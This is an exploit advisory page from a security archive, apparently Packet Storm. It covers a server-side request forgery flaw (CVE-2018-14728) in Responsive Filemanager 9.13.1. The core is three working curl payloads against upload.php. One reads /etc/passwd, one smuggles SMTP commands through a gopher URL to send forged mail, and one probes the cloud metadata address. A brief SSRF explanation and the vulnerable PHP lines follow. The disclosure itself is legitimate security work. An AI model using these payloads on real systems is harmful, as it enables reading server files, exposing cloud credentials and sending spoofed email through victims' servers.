exploit the possibilities

Responsive Filemanager 9.13.1 Server-Side Request Forgery

Responsive Filemanager 9.13.1 Server-Side Request Forgery
Posted Jul 29, 2018
Authored by Guia Brahim Fouad

Responsive Filemanager version 9.13.1 suffers from a server-side request forgery vulnerability.

tags | exploit
advisories | CVE-2018-14728
MD5 | 9ea189ebe988e84ea737aadd00966199

Responsive Filemanager 9.13.1 Server-Side Request Forgery

Change Mirror Download
 # Exploit Title: Responsive filemanager - SSRF
# Date: 29/07/2018
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link:
https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728

Type
[Security] Bug report - SSRF - Security Issue

PoC
curl 'http://localhost/filemanager/upload.php' --data
'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://
127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=
http://169.254.169.254/openstack'
...

Description of the problem
Server Side Request Forgery (SSRF) refers to an attack where in an attacker
is able to send a crafted request from a vulnerable web application. SSRF
is usually used to target internal systems behind firewalls that are
normally inaccessible to an attacker from the external network.
Additionally, itas also possible for an attacker to leverage SSRF to access
services from the same server that is listening on the loopback interface
(127.0.0.1).

Typically Server Side Request Forgery (SSRF) occurs when a web application
is making a request, where an attacker has full or partial control of the
request that is being sent. A common example is when an attacker can
control all or part of the URL to which the web application makes a request
to some third-party service

List the steps to reproduce the issue
The GET parameter 'url' is received in line 71 of the file upload.php.

File : upload.php

Line| Code
71 | if(isset($_POST['url'])){
73 | $ch = curl_init($_POST['url']);
77 | curl_exec($ch);

Environment
responsive filemanager version: 9.13.1
php version: 7.0
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    15 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close